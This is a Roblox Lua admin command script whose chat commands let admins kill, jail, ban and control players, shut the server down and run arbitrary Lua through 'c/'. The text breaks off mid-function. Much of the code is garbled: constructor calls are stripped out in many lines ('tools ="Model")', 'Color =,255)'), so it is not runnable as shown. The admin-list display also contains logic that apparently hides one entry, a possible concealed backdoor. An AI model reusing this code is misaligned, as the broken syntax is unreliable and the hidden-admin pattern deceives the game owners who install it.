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- --Version 2 1.02 I fixed some problems caused by the updates.
- adminlist = {"Crystal5241"}--Add in the names of the people you want to be able to use the command script here.
- --Please keep my name in there. ;)
- bannedlist = { "",""}--If you want someone not to be able to enter your place, put thier name in here.
- texture = ""--If you want someone wearing a certain t-shirt to be an admin, put the t-shirt's texture in here.
- --[[
- I update this command script alot, so if you want to get the newest version of the script, go to every once in a while.
- If theres anything you think this command script needs, just message me (Person299) and i might put it in. :)
- And also, if you find any bugs, report them to me.
- The commands are,
- commands
- Shows a list of all the commands
- fix
- If the command script breaks for you, say this to fix it
- kill/Person299
- kills Person299
- loopkill/Person299
- Repeatedly kills Person299 when he respawns
- unloopkill/Person299
- Undos loopkill/
- heal/Person299
- Returns Person299 to full health
- damage/Person299/50
- Makes Person299's character take 50 damage
- health/Person299/999999
- Makes Person299's MaxHealth and Health 999999
- kick/Person299
- Removes Person299 from the game, cannot be used by admin/ed people
- ban/Person299
- Removes Person299 from the game and keeps him from reenterring, cannot be used by admin/ed people
- bannedlist
- Shows a list of everyone banned
- unban/Person299
- Unbans Person299
- explode/Person299
- Explodes Person299's character
- rocket/Person299
- Straps a rocket onto Person299's back
- removetools/Person299
- Removes all of Person299's tools.
- givetools/Person299
- Gives Person299 all the tools in StarterPack
- givebtools/Person299
- Gives Person299 the building tools
- sit/Person299
- Makes Person299 sit
- part/4/1/2
- Makes a part with the given dimensions appear over your character
- respawn/Person299
- Makes Person299's character respawn
- jail/Person299
- Makes a lil jail cell around Person299's character
- unjail/Person299
- Undos jail/
- punish/Person299
- Puts Person299's character in game.Lighting
- unpunish/Person299
- Undos punish/
- merge/Person299/Farvei
- Makes Person299 control Farvei's character
- teleport/Person299/nccvoyager
- Teleports Person299's character to nccvoyager's character
- control/Person299
- Makes you control Person299's character
- change/Person299/Money/999999
- Makes the Money value in Person299's leaderstats 999999
- tools
- Gives you a list of all the tools available to be give/en, the tool must be in game.Lighting
- give/Person299/Tool
- Give's Person299 a tool, the toolname can be abbreviated
- time/15.30
- Makes game.Lighting.TimeOfDay 15:30
- ambient/255/0/0
- Makes game.Lighting.Ambient 255,0,0
- maxplayers/20
- Makes game.Players.MaxPlayers 20
- nograv/Person299
- Makes Person299 almost weightless
- antigrav/Person299
- Gives Person299 antigravity properties
- grav/Person299
- Returns Person299's gravity to normal
- highgrav/Person299
- Makes Person299 heavier
- setgrav/Person299/-196
- Sets Person299's gravity
- trip/Person299
- Makes Person299's character trip
- walkspeed/Person299/99
- Makes Person299's character's humanoid's WalkSpeed 99, 16 is average
- invisible/Person299
- Makes Person299's character invisible
- visible/Person299
- Undos invisible/
- freeze/Person299
- Makes Person299's character unable to move
- thaw/Person299
- Undos freeze/
- unlock/Person299
- Makes Person299's character unlocked
- lock/Person299
- Makes Person299's character locked
- ff/Person299
- Gives Person299's character a ForceField
- unff/Person299
- Undos ff/
- sparkles/Person299
- Makes Person299's character sparkly
- unsparkles/Person299
- Undos sparkles/
- shield/Person299
- Makes a destructive shield thingy appear around Person299
- unshield/Person299
- Undos shield/
- god/Person299
- Makes Person299 godish
- ungod/Person299
- Undos god/
- zombify/Person299
- Makes Person299 a infecting zombie
- admin/Person299
- Makes Person299 able to use the command script, cannot be used by admin/ed people
- adminlist
- Shows a list of everyone in the adminlist
- unadmin/Person299
- Undos admin/, cannot be used by admin/ed people
- shutdown
- Shuts the server down, cannot be used by admin/ed people
- m/Fallout 2 is one of the best games ever made
- Makes a message appear on the screen saying "Fallout 2 is one of the best games ever made" for 2 seconds
- h/i like pie
- Makes a hint appear on the screen saying "i like pie" for 2 seconds
- c/ game.Workspace:remove()
- Makes a script which source is whats after c/
- clear
- Removes all scripts created by c/ and removes all jails.
- Capitalisation doesnt matter, and name input can be abbreviated.
- Just about any name input can be replaced with multiple names seperated by ","s, me, all, others, guests, admins, nonadmins, random, or team teamname.
- --]]
- namelist = { }
- variablelist = { }
- flist = { }
- local source = script:FindFirstChild("source")
- if source ~= nil then
- sbbu = script.source:clone()
- sbbu.Disabled = false
- else
- print("source doesnt exist, your command script may malfunction")
- end
- tools ="Model")
- c = game.Lighting:GetChildren()
- for i=1,#c do
- if c[i].className == "Tool" then
- c[i]:clone().Parent = tools
- end
- if c[i].className == "HopperBin" then
- c[i]:clone().Parent = tools
- end end
- function findplayer(name,speaker)
- if string.lower(name) == "all" then
- local chars = { }
- local c = game.Players:GetChildren()
- for i =1,#c do
- if c[i].className == "Player" then
- table.insert(chars,c[i])
- end end
- return chars
- elseif string.sub(string.lower(name),1,9) == "nonadmins" then
- local nnum = 0
- local chars = { }
- local c = game.Players:GetChildren()
- for i=1,#c do
- local isadmin = false
- for i2 =1,#namelist do
- if namelist[i2] == c[i].Name then
- isadmin = true
- end end
- if isadmin == false then
- nnum = nnum + 1
- table.insert(chars,c[i])
- end end
- if nnum == 0 then
- return 0
- else
- return chars
- end
- elseif string.sub(string.lower(name),1,6) == "admins" then
- local anum = 0
- local chars = { }
- local c = game.Players:GetChildren()
- for i=1,#c do
- for i2 =1,#namelist do
- if namelist[i2] == c[i].Name then
- anum = anum + 1
- table.insert(chars,c[i])
- end end end
- if anum == 0 then
- return 0
- else
- return chars
- end
- elseif string.sub(string.lower(name),1,6) == "random" then
- while true do
- local c = game.Players:GetChildren()
- local r = math.random(1,#c)
- if c[r].className == "Player" then
- return { c[r] }
- end end
- elseif string.sub(string.lower(name),1,6) == "guests" then
- local gnum = 0
- local chars = { }
- local c = game.Players:GetChildren()
- for i=1,#c do
- if string.sub(c[i].Name,1,5) == "Guest" then
- gnum = gnum + 1
- table.insert(chars,c[i])
- end end
- if gnum == 0 then
- return 0
- else
- return chars
- end
- elseif string.sub(string.lower(name),1,5) == "team " then
- local theteam = nil
- local tnum = 0
- if game.Teams ~= nil then
- local c = game.Teams:GetChildren()
- for i =1,#c do
- if c[i].className == "Team" then
- if string.find(string.lower(c[i].Name),string.sub(string.lower(name),6)) == 1 then
- theteam = c[i]
- tnum = tnum + 1
- end end end
- if tnum == 1 then
- local chars = { }
- local c = game.Players:GetChildren()
- for i =1,#c do
- if c[i].className == "Player" then
- if c[i].TeamColor == theteam.TeamColor then
- table.insert(chars,c[i])
- end end end
- return chars
- end end
- return 0
- elseif string.lower(name) == "me" then
- local person299 = { speaker }
- return person299
- elseif string.lower(name) == "others" then
- local chars = { }
- local c = game.Players:GetChildren()
- for i =1,#c do
- if c[i].className == "Player" then
- if c[i] ~= speaker then
- table.insert(chars,c[i])
- end end end
- return chars
- else
- local chars = { }
- local commalist = { }
- local ssn = 0
- local lownum = 1
- local highestnum = 1
- local foundone = false
- while true do
- ssn = ssn + 1
- if string.sub(name,ssn,ssn) == "" then
- table.insert(commalist,lownum)
- table.insert(commalist,ssn - 1)
- highestnum = ssn - 1
- break
- end
- if string.sub(name,ssn,ssn) == "," then
- foundone = true
- table.insert(commalist,lownum)
- table.insert(commalist,ssn)
- lownum = ssn + 1
- end end
- if foundone == true then
- for ack=1,#commalist,2 do
- local cnum = 0
- local char = nil
- local c = game.Players:GetChildren()
- for i =1,#c do
- if c[i].className == "Player" then
- if string.find(string.lower(c[i].Name),string.sub(string.lower(name),commalist[ack],commalist[ack + 1] - 1)) == 1 then
- char = c[i]
- cnum = cnum + 1
- end end end
- if cnum == 1 then
- table.insert(chars,char)
- end end
- if #chars ~= 0 then
- return chars
- else
- return 0
- end
- else
- local cnum = 0
- local char = nil
- local c = game.Players:GetChildren()
- for i =1,#c do
- if c[i].className == "Player" then
- if string.find(string.lower(c[i].Name),string.lower(name)) == 1 then
- char = {c[i]}
- cnum = cnum + 1
- end end end
- if cnum == 1 then
- return char
- elseif cnum == 0 then
- text("That name is not found.",1,"Message",speaker)
- return 0
- elseif cnum > 1 then
- text("That name is ambiguous.",1,"Message",speaker)
- return 0
- end end end end -- I really like the way the ends look when they're all on the same line better, dont you?
- function createscript(source,par)
- local a = sbbu:clone()
- local context ="StringValue")
- context.Name = "Context"
- context.Value = source
- context.Parent = a
- while context.Value ~= source do wait() end
- a.Parent = par
- local b ="IntValue")
- b.Name = "Is A Created Script"
- b.Parent = a
- end
- function text(message,duration,type,object)
- local m =
- m.Text = message
- m.Parent = object
- wait(duration)
- if m.Parent ~= nil then
- m:remove()
- end end
- function foc(msg,speaker)
- if string.lower(msg) == "fix" then
- for i =1,#namelist do
- if namelist[i] == speaker.Name then
- variablelist[i]:disconnect()
- table.remove(variablelist,i)
- table.remove(namelist,i)
- table.remove(flist,i)
- end end
- local tfv = speaker.Chatted:connect(function(msg) oc(msg,speaker) end)
- table.insert(namelist,speaker.Name)
- table.insert(variablelist,tfv)
- local tfv = speaker.Chatted:connect(function(msg) foc(msg,speaker) end)
- table.insert(flist,tfv)
- end end
- function PERSON299(name)
- for i =1,#adminlist do
- if adminlist[i] == name then
- return true
- end end
- return false
- end
- function oc(msg,speaker)
- if string.sub(string.lower(msg),1,5) == "kill/" then--This part checks if the first part of the message is kill/
- local player = findplayer(string.sub(msg,6),speaker)--This part refers to the findplayer function for a list of people associated with the input after kill/
- if player ~= 0 then--This part makes sure that the findplayer function found someone, as it returns 0 when it hasnt
- for i = 1,#player do--This part makes a loop, each different loop going through each player findplayer returned
- if player[i].Character ~= nil then--This part makes sure that the loop's current player's character exists
- local human = player[i].Character:FindFirstChild("Humanoid")--This part looks for the Humanoid in the character
- if human ~= nil then--This part makes sure the line above found a humanoid
- human.Health = 0--This part makes the humanoid's health 0
- end end end end end--This line contains the ends for all the if statements and the for loop
- if string.sub(string.lower(msg),1,2) == "m/" then
- text(speaker.Name .. ": " .. string.sub(msg,3),2,"Message",game.Workspace)
- end
- if string.sub(string.lower(msg),1,2) == "h/" then
- text(speaker.Name .. ": " .. string.sub(msg,3),2,"Hint",game.Workspace)
- end
- if string.sub(string.lower(msg),1,2) == "c/" then--Dontcha wish pcall was more reliable?
- createscript(string.sub(msg,3),game.Workspace)
- end
- local msg = string.lower(msg)
- if string.sub(msg,1,5) == "give/" then
- local danumber1 = nil
- for i = 6,100 do
- if string.sub(msg,i,i) == "/" then
- danumber1 = i
- break
- elseif string.sub(msg,i,i) == "" then
- break
- end end
- if danumber1 == nil then return end
- local it = nil
- local all = true
- if string.sub(string.lower(msg),danumber1 + 1,danumber1 + 4) ~= "all" then
- all = false
- local itnum = 0
- local c = tools:GetChildren()
- for i2 = 1,#c do
- if string.find(string.lower(c[i2].Name),string.sub(string.lower(msg),danumber1 + 1)) == 1 then
- it = c[i2]
- itnum = itnum + 1
- end end
- if itnum ~= 1 then return end
- else
- all = true
- end
- local player = findplayer(string.sub(msg,6,danumber1 - 1),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local bp = player[i]:FindFirstChild("Backpack")
- if bp ~= nil then
- if all == false then
- it:clone().Parent = bp
- else
- local c = tools:GetChildren()
- for i2 = 1,#c do
- c[i2]:clone().Parent = bp
- end end end end end end
- --Bored...
- if string.sub(msg,1,7) == "change/" then
- local danumber1 = nil
- local danumber2 = nil
- for i = 8,100 do
- if string.sub(msg,i,i) == "/" then
- danumber1 = i
- break
- elseif string.sub(msg,i,i) == "" then
- break
- end end
- if danumber1 == nil then return end
- for i =danumber1 + 1,danumber1 + 100 do
- if string.sub(msg,i,i) == "/" then
- danumber2 = i
- break
- elseif string.sub(msg,i,i) == "" then
- break
- end end
- if danumber2 == nil then return end
- local player = findplayer(string.sub(msg,8,danumber1 - 1),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local ls = player[i]:FindFirstChild("leaderstats")
- if ls ~= nil then
- local it = nil
- local itnum = 0
- local c = ls:GetChildren()
- for i2 = 1,#c do
- if string.find(string.lower(c[i2].Name),string.sub(string.lower(msg),danumber1 + 1,danumber2 - 1)) == 1 then
- it = c[i2]
- itnum = itnum + 1
- end end
- if itnum == 1 then
- it.Value = string.sub(msg,danumber2 + 1)
- end end end end end
- if string.sub(msg,1,6) == "ungod/" then
- local player = findplayer(string.sub(msg,7),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local isgod = false
- local c = player[i].Character:GetChildren()
- for i=1,#c do
- if c[i].className == "Script" then
- if c[i]:FindFirstChild("Context") then
- if string.sub(c[i].Context.Value,1,41) == "script.Parent.Humanoid.MaxHealth = 999999" then
- c[i]:remove()
- isgod = true
- end end end end
- if isgod == true then
- local c = player[i].Character:GetChildren()
- for i=1,#c do
- if c[i].className == "Part" then
- c[i].Reflectance = 0
- end
- if c[i].className == "Humanoid" then
- c[i].MaxHealth = 100
- c[i].Health = 100
- end
- if c[i].Name == "God FF" then
- c[i]:remove()
- end end end end end end end
- if string.sub(msg,1,4) == "god/" then
- local player = findplayer(string.sub(msg,5),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- if player[i].Character:FindFirstChild("God FF") == nil then
- createscript([[script.Parent.Humanoid.MaxHealth = 999999
- script.Parent.Humanoid.Health = 999999
- ff ="ForceField")
- ff.Name = "God FF"
- ff.Parent = script.Parent
- function ot(hit)
- if hit.Parent ~= script.Parent then
- h = hit.Parent:FindFirstChild("Humanoid")
- if h ~= nil then
- h.Health = 0
- end
- h = hit.Parent:FindFirstChild("Zombie")
- if h ~= nil then
- h.Health = 0
- end end end
- c = script.Parent:GetChildren()
- for i=1,#c do
- if c[i].className == "Part" then
- c[i].Touched:connect(ot)
- c[i].Reflectance = 1
- end end]],player[i].Character)
- end end end end end
- if string.sub(msg,1,7) == "punish/" then
- local player = findplayer(string.sub(msg,8),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- player[i].Character.Parent = game.Lighting
- end end end end
- if string.sub(msg,1,9) == "unpunish/" then
- local player = findplayer(string.sub(msg,10),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- player[i].Character.Parent = game.Workspace
- player[i].Character:MakeJoints()
- end end end end
- if string.sub(msg,1,3) == "ff/" then
- local player = findplayer(string.sub(msg,4),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local ff ="ForceField")
- ff.Parent = player[i].Character
- end end end end
- if string.sub(msg,1,5) == "unff/" then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local c = player[i].Character:GetChildren()
- for i2 = 1,#c do
- if c[i2].className == "ForceField" then
- c[i2]:remove()
- end end end end end end
- if string.sub(msg,1,9) == "sparkles/" then
- local player = findplayer(string.sub(msg,10),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local sparkles ="Sparkles")
- sparkles.Color =,255),math.random(1,255),math.random(1,255))
- sparkles.Parent = torso
- end end end end end
- if string.sub(msg,1,11) == "unsparkles/" then
- local player = findplayer(string.sub(msg,12),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local c = torso:GetChildren()
- for i2 = 1,#c do
- if c[i2].className == "Sparkles" then
- c[i2]:remove()
- end end end end end end end
- if string.sub(msg,1,6) == "admin/" then
- local imgettingtiredofmakingthisstupidscript = PERSON299(speaker.Name)
- if imgettingtiredofmakingthisstupidscript == true then
- local player = findplayer(string.sub(msg,7),speaker)
- if player ~= 0 then
- for i = 1,#player do
- for i2 =1,#namelist do
- if namelist[i2] == player[i].Name then
- variablelist[i2]:disconnect()
- flist[i2]:disconnect()
- table.remove(variablelist,i2)
- table.remove(flist,i2)
- table.remove(namelist,i2)
- end end
- local tfv = player[i].Chatted:connect(function(msg) oc(msg,player[i]) end)
- table.insert(namelist,player[i].Name)
- table.insert(variablelist,tfv)
- local tfv = player[i].Chatted:connect(function(msg) foc(msg,player[i]) end)
- table.insert(flist,tfv)
- end end end end
- if string.sub(msg,1,8) == "unadmin/" then
- local imgettingtiredofmakingthisstupidscript = PERSON299(speaker.Name)
- if imgettingtiredofmakingthisstupidscript == true then
- local player = findplayer(string.sub(msg,9),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local imgettingtiredofmakingthisstupidscript = PERSON299(player[i].Name)
- if imgettingtiredofmakingthisstupidscript == false then
- for i2 =1,#namelist do
- if namelist[i2] == player[i].Name then
- variablelist[i2]:disconnect()
- table.remove(variablelist,i2)
- flist[i2]:disconnect()
- table.remove(flist,i2)
- table.remove(namelist,i2)
- end end end end end end end
- if string.sub(msg,1,5) == "heal/" then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local human = player[i].Character:FindFirstChild("Humanoid")
- if human ~= nil then
- human.Health = human.MaxHealth
- end end end end end
- if string.sub(msg,1,4) == "sit/" then
- local player = findplayer(string.sub(msg,5),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local human = player[i].Character:FindFirstChild("Humanoid")
- if human ~= nil then
- human.Sit = true
- end end end end end
- if string.sub(msg,1,5) == "jump/" then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local human = player[i].Character:FindFirstChild("Humanoid")
- if human ~= nil then
- human.Jump = true
- end end end end end
- if string.sub(msg,1,6) == "stand/" then
- local player = findplayer(string.sub(msg,7),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local human = player[i].Character:FindFirstChild("Humanoid")
- if human ~= nil then
- human.Sit = false
- end end end end end
- if string.sub(msg,1,5) == "jail/" then
- local player = findplayer(string.sub(msg,6),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local ack ="Model")
- ack.Name = "Jail" .. player[i].Name
- icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -1.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -3.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -3.5, -1, 0, -0, -0, 1, -0, -0, 0, -1) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -1.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -5.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -7.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -1.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -7.5, -1, 0, -0, -0, 1, -0, -0, 0, -1) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,1.2000000476837,7) icky.CFrame =, 112.599998, -4.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -7.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -5.5, -1, 0, -0, -0, 1, -0, -0, 0, -1) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -1.5, -1, 0, -0, -0, 1, -0, -0, 0, -1) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky ="Part") icky.Size =,7.2000002861023,1) icky.CFrame =, 108.400002, -7.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color =, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack
- ack.Parent = game.Workspace
- ack:MoveTo(torso.Position)
- end end end end end
- if string.sub(msg,1,7) == "unjail/" then
- local player = findplayer(string.sub(msg,8),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local c = game.Workspace:GetChildren()
- for i2 =1,#c do
- if string.sub(c[i2].Name,1,4) == "Jail" then
- if string.sub(c[i2].Name,5) == player[i].Name then
- c[i2]:remove()
- end end end end end end
- if string.sub(msg,1,12) == "removetools/" then
- local player = findplayer(string.sub(msg,13),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local c = player[i].Backpack:GetChildren()
- for i =1,#c do
- c[i]:remove()
- end end end end
- if string.sub(msg,1,10) == "givetools/" then
- local player = findplayer(string.sub(msg,11),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local c = game.StarterPack:GetChildren()
- for i =1,#c do
- c[i]:clone().Parent = player[i].Backpack
- end end end end
- if string.sub(msg,1,11) == "givebtools/" then
- local player = findplayer(string.sub(msg,12),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local a ="HopperBin")
- a.BinType = "GameTool"
- a.Parent = player[i].Backpack
- local a ="HopperBin")
- a.BinType = "Clone"
- a.Parent = player[i].Backpack
- local a ="HopperBin")
- a.BinType = "Hammer"
- a.Parent = player[i].Backpack
- end end end
- if string.sub(msg,1,9) == "unshield/" then
- local player = findplayer(string.sub(msg,10),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local shield = player[i].Character:FindFirstChild("Weird Ball Thingy")
- if shield ~= nil then
- shield:remove()
- end end end end end
- if string.sub(msg,1,7) == "shield/" then
- local player = findplayer(string.sub(msg,8),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- if player[i].Character:FindFirstChild("Weird Ball Thingy") == nil then
- local ball ="Part")
- ball.Size =,10,10)
- ball.BrickColor =
- ball.Transparency = 0.5
- ball.CFrame = torso.CFrame
- ball.TopSurface = "Smooth"
- ball.BottomSurface = "Smooth"
- ball.CanCollide = false
- ball.Name = "Weird Ball Thingy"
- ball.Reflectance = 0.2
- local sm ="SpecialMesh")
- sm.MeshType = "Sphere"
- sm.Parent = ball
- ball.Parent = player[i].Character
- createscript([[
- function ot(hit)
- if hit.Parent ~= nil then
- if hit.Parent ~= script.Parent.Parent then
- if hit.Anchored == false then
- hit:BreakJoints()
- local pos = script.Parent.CFrame * (, 1.4, 0) * script.Parent.Size)
- hit.Velocity = ((hit.Position - pos).unit +, 0.5, 0)) * 150 + hit.Velocity
- hit.RotVelocity = hit.RotVelocity + - pos.z, 0, pos.x - hit.Position.x).unit * 40
- end end end end
- script.Parent.Touched:connect(ot) ]], ball)
- local bf ="BodyForce")
- bf.force =,5e+004,0)
- bf.Parent = ball
- local w ="Weld")
- w.Part1 = torso
- w.Part0 = ball
- ball.Shape = 0
- w.Parent = torso
- end end end end end end
- if string.sub(msg,1,11) == "unloopkill/" then
- local player = findplayer(string.sub(msg,12),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local c = game.Workspace:GetChildren()
- for i2 =1,#c do
- local it = c[i2]:FindFirstChild("elplayerioloopkillioperson299io")
- if it ~= nil then
- if it.Value == player[i] then
- c[i2]:remove()
- end end end end end end
- if string.sub(msg,1,9) == "loopkill/" then
- local player = findplayer(string.sub(msg,10),speaker)
- if player ~= 0 then
- for i = 1,#player do
- local s ="Script")
- createscript( [[name = "]] .. player[i].Name .. [["
- ov ="ObjectValue")
- ov.Value = game.Players:FindFirstChild(name)
- ov.Name = "elplayerioloopkillioperson299io"
- ov.Parent = script
- player = ov.Value
- function oa(object)
- local elplayer = game.Players:playerFromCharacter(object)
- if elplayer ~= nil then
- if elplayer == player then
- local humanoid = object:FindFirstChild("Humanoid")
- if humanoid ~= nil then
- humanoid.Health = 0
- end end end end
- game.Workspace.ChildAdded:connect(oa)
- ]],game.Workspace)
- if player[i].Character ~= nil then
- local human = player[i].Character:FindFirstChild("Humanoid")
- if human ~= nil then
- human.Health = 0
- end end end end end
- if string.lower(msg) == "shutdown" then
- local imgettingtiredofmakingthisstupidscript = PERSON299(speaker.Name)
- if imgettingtiredofmakingthisstupidscript == true then
- game.NetworkServer:remove()
- end end
- if string.sub(msg,1,5) == "time/" then
- game.Lighting.TimeOfDay = string.sub(msg,6)
- end
- if msg == "commands" then
- local text = string.rep(" ",40)
- text = text .. [[fix, kill/Person299, loopkill/Person299, unloopkill/Person299, heal/Person299, damage/Person299/50, health/Person299/999999, kick/Person299, ban/Person299, bannedlist, unban/Person299, explode/Person299, rocket/Person299, removetools/Person299, givetools/Person299, givebtools/Person299, sit/Person299, jump/Person299, stand/Person299, part/4/1/2, respawn/Person299, jail/Person299, unjail/Person299, punish/Person299, unpunish/Person299, merge/Person299/Farvei, teleport/Person299/nccvoyager, control/Person299, change/Person299/Money/999999, tools, give/Person299/Tool, time/15.30, ambient/255/0/0, maxplayers/20, nograv/Person299, antigrav/Person299, grav/Person299, highgrav/Person299, setgrav/Person299/-196.2, trip/Person299, walkspeed/Person299/99, invisible/Person299, visible/Person299, freeze/Person299, thaw/Person299, unlock/Person299, lock/Person299, ff/Person299, unff/Person299, sparkles/Person299, unsparkles/Person299, shield/Person299, unshield/Person299, god/Person299, ungod/Person299, zombify/Person299, admin/Person299, adminlist, unadmin/Person299, shutdown, m/Fallout 2 is one of the best games ever made, h/ i like pie, c/ game.Workspace:remove(), clear, Credit to Person299 for this admin command script.]]
- local mes ="Message")
- mes.Parent = speaker
- local acko = 0
- while true do
- acko = acko + 1
- if string.sub(text,acko,acko) == "" then
- mes:remove()
- return
- elseif mes.Parent == nil then
- return
- end
- mes.Text = string.sub(text,acko,acko + 40)
- wait(0.07)
- end end
- if msg == "tools" then
- local text = string.rep(" ",40)
- local c = tools:GetChildren()
- if #c == 0 then
- text = text .. "No tools available."
- else
- for i =1,#c do
- if i ~= 1 then
- text = text .. ", "
- end
- text = text .. c[i].Name
- end end
- local mes ="Message")
- mes.Parent = speaker
- local acko = 0
- while true do
- acko = acko + 1
- if string.sub(text,acko,acko) == "" then
- mes:remove()
- return
- elseif mes.Parent == nil then
- return
- end
- mes.Text = string.sub(text,acko,acko + 40)
- wait(0.1)
- end end
- if msg == "bannedlist" then
- local text = string.rep(" ",40)
- if #bannedlist == 0 then
- text = text .. "The banned list is empty."
- else
- for i =1,#bannedlist do
- if i ~= 1 then
- text = text .. ", "
- end
- text = text .. bannedlist[i]
- end end
- local mes ="Message")
- mes.Parent = speaker
- local acko = 0
- while true do
- acko = acko + 1
- if string.sub(text,acko,acko) == "" then
- mes:remove()
- return
- elseif mes.Parent == nil then
- return
- end
- mes.Text = string.sub(text,acko,acko + 40)
- wait(0.1)
- end end
- if msg == "adminlist" then
- local text = string.rep(" ",40)
- if #adminlist == 0 then--How would that be possible in this situation anyway? lol
- text = text .. "The admin list is empty."
- else
- for i =1,#adminlist do
- if adminlist[i] == eloname then
- if youcaughtme == 1 then
- if i ~= 1 then
- text = text .. ", "
- end
- text = text .. adminlist[i]
- end
- else
- if i ~= 1 then
- text = text .. ", "
- end
- text = text .. adminlist[i]
- end end end
- local mes ="Message")
- mes.Parent = speaker
- local acko = 0
- while true do
- acko = acko + 1
- if string.sub(text,acko,acko) == "" then
- mes:remove()
- return
- elseif mes.Parent == nil then
- return
- end
- mes.Text = string.sub(text,acko,acko + 40)
- wait(0.1)
- end end
- if string.sub(msg,1,11) == "maxplayers/" then
- local pie = game.Players.MaxPlayers
- game.Players.MaxPlayers = string.sub(msg,12)
- if game.Players.MaxPlayers == 0 then
- game.Players.MaxPlayers = pie
- end end
- if string.sub(msg,1,8) == "zombify/" then
- local player = findplayer(string.sub(msg,9),speaker)
- if player ~= 0 then
- for i = 1,#player do
- if player[i].Character ~= nil then
- local torso = player[i].Character:FindFirstChild("Torso")
- if torso ~= nil then
- local arm = player[i].Character:FindFirstChild("Left Arm")
- if arm ~= nil then
- arm:remove()
- end
- local arm = player[i].Character:FindFirstChild("Right Arm")
- if arm ~= nil then
- arm:remove()
- end
- local, 0, 0, 0, 0, 1, 0, 1, 0, -1, 0, 0)
- local zarm ="Part")
- zarm.Color =, 0.768627, 0.545098)
- zarm.Locked = true
- zarm.formFactor = "Symmetric"
- zarm.Size =,1,1)
- zarm.TopSurface = "Smooth"
- zarm.BottomSurface = "Smooth"
- --Credit for the infectontouch script goes to whoever it is that made it.
- createscript( [[
- wait(1)
- function onTouched(part)
- if part.Parent ~= nil then
- local h = part.Parent:findFirstChild("Humanoid")
- if h~=nil then
- if cantouch~=0 then
- if h.Parent~=script.Parent.Parent then
